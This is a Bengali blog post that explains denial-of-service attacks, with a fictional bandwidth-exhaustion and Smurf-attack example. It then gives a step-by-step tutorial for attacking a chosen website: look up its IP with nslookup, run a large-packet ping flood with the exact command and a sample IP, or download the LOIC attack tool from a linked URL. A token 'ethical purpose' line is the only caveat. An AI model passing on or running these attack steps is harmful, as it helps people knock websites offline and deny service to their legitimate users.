ডেনাইয়াল অফ সার্ভিস অ্যাটাক বা সেবা বাধাদানের আক্রমণ হলো কোনো কম্পিউটার সিস্টেমের কোনো রিসোর্স বা সেবার (service) প্রকৃত ব্যবহারকারীদের বাধা দেয়ার একটি কৌশল। কোনো কম্পিউটার সিস্টেম বা ইন্টারনেট ওয়েবসাইটে এই আক্রমণ চালানোর মাধ্যমে ঐ সিস্টেম বা সাইটের যথাযথ কার্যক্রমকে ধীর গতির, বা অনেক ক্ষেত্রে পুরোপুরি বন্ধ করে দেয়া হয়।
এই আক্রমণ চালানোর একটা বেশ জনপ্রিয় পদ্ধতি হলো বাইরে থেকে ঐ সিস্টেম বা সাইটের সাথে যোগাযোগের জন্য অসংখ্য বার্তা পাঠাতে থাকা। একটি বার্তা বিশ্লেষণ করতে করতে আরো বেশ কয়টি বার্তা যদি এসে পড়ে, তখন ঐ সিস্টেমটি আক্রমণকারীর পাঠানো বার্তা বিশ্লেষণেই ব্যস্ত থাকে, এবং প্রকৃত ব্যবহারকারীরা ধীর গতির সম্মুখীন হন।
ডেনাইয়াল অফ সার্ভিস আক্রমণের প্রধান দুটি মাধ্যম হলো
- টার্গেট করা কম্পিউটারকে রিসেট করে দেয়া, অথবা তার সীমিত রিসোর্সগুলোকে ব্যবহার করে অন্যদের ব্যবহারের অযোগ্য করে ফেলা
- আক্রমণের লক্ষ্য যে সিস্টেম বা সাইট, তার সাথে প্রকৃত ব্যবহারকারীদের যোগাযোগের মাধ্যম বন্ধ করে দেয়া।
উদাহরণ
ধরা যাক, আসিফের একটি সাইট আছে যার নাম abcd.com ডট কম। এই ওয়েবসাইটটি যে খানে হোস্ট করা হয়েছে, সেখানে দৈনিক ১ গিগাবাইট ব্যান্ডউইডথ কেনা আছে। দিনে ১০ হাজার হিট হয় এই সাইটে, এবং ৪০০ মেগাবাইটের বেশি ব্যান্ড উইডথ দরকার হয় না। এখন এই ওয়েবসাইটকে আক্রমণকারী শত্রু শওকত একটি স্ক্রিপ্ট লিখে ঐ সাইটে অজস্র ভুয়া হিট করতে থাকলো, ফলে এক ঘণ্টারও কম সময়ে ২৫০০০ হিট করে ১ গিগাবাইট সীমা অতিক্রম করে ফেলা হলো। এখন ওয়েবসাইট ব্যবহারকারীদের কেউই আর ঐ সাইটে যেতে পারবেন না।ধরা যাক, করিম এবার আক্রমণ ঠেকানোর জন্য আসিফ ব্যান্ডউইডথের ব্যবস্থা করলেন, এবং শওকতের কম্পিউটারের আইপি অ্যাড্রেস নিষিদ্ধ করে দিলেন। এবার শওকত ভিন্ন পদ্ধতিতে আগালেন … সরাসরি আক্রমণ করার বদলে “স্মার্ফ অ্যাটাক” (Smurf attack) নামের আক্রমণ করলেন। এই আক্রমণের সময়ে শওকত সরাসরি করিমের কম্পিউটারে আক্রমণ না করে ইন্টারনেটে হাজার হাজার সাইটে ping মেসেজ পাঠালেন। (সংযোগ ঠিক আছে কি না, তা পরীক্ষা করার জন্য ping ব্যবহৃত হয়। এই মেসেজ কোনো কম্পিউটারে পাঠালে ঐ কম্পিউটার মেসেজের জবাবে আরেকটি মেসেজ প্রেরক কম্পিউটারে পাঠায়)। তবে শওকত পিং পাঠানোর আগে কারসাজি করে মেসেজের প্রেরকের নাম পালটে দিলেন, অর্থাৎ প্রেরকের ঠিকানার অংশে নিজের কম্পিউটারের আইপির বদলে করিমের সাইটের আইপি দিয়ে দিলেন। ফলে হাজার হাজার সাইট যখন এই পিং বার্তার জবাব দিবে, তখন সেই জবাব গুলো চলে যাবে করিমের কম্পিউটারে। একই সময়ে আসা এই হাজার হাজার বার্তা গ্রহণ করতে করতে করিমের কম্পিউটার আসল গ্রাহকদের সাথে যোগাযোগ করার সময় পাবে না। ফলে ওয়েবসাইটটিতে যারা ঢুকতে যাবেন, তাঁরা ব্যর্থ হবেন।
আপনি কিভাবে DOS অ্যাটাক করবেন?
আমি এই অ্যাটাক করার দুটি পদ্ধটি আপনাদের দেব
DOS Attack by CMD (command prompt)
আপনার স্টার্ট মেনু থেকে run এ জান এবং টাইপ করুন cmd
এরপর সেখানে nslookup দিএ আপনার কাঙ্খিত ওয়েবসাইট এর নাম লিখুন।
eg. nslookup www.google.co.in
আইপি খুজে পাবার পর আপনি অ্যাটাক করার জন্য প্রস্তুত
type in command
ping website-IP -l 65500 -n 10000000 -w 0.00001
-n 10000000 হল ডস অ্যাটাক করার সংখা ,আপনি এটি চেঞ্জ করতে পারেন।
website-IP টেক্সট টি ওয়েবসাইট আইপি কে রিপ্লেস করে।
w 0.00001 হল একটি পিং অ্যাটাক এর মধ্যবর্তী সময়। আপনি এটি চেঞ্জ করে 0.0000 2 করতে পারেন।
for eg: আইপি অ্যাড্রেস যদি 112.158.10.2 হয় তাহলে টাইপ করুন
ping 112.158.10.2 -l 65500 -n 10000000 -w 0.00001
আপনার কায শেষ। এবার অপেক্ষা করুন । কিন্তু eithical purpose ছাড়া ব্যবহার করবেন না।
Dos attack with LOIC Software
LOIC Low Orbit Ion Cannon (LOIC) is an open source network stress testing and denial-of-service attack application, written in C#
আপণি যদি উপরের ম্যানুয়াল পদ্ধতি না বোঝেন বা এই সম্পরকে কিছুই না জানেন তাহল্কে এই সফটওয়্যার টি ব্যবহার করুন/
http://sourceforge.net/projects/loic/files/loic/loic-1.0.4/loic-1.0.4-binary.zip/download
তাহলে আজ এই পর্যন্ত। টিউন সম্পরকে অবশ্যই ফিডব্যাক দিবেন
0 Comments:
Post a Comment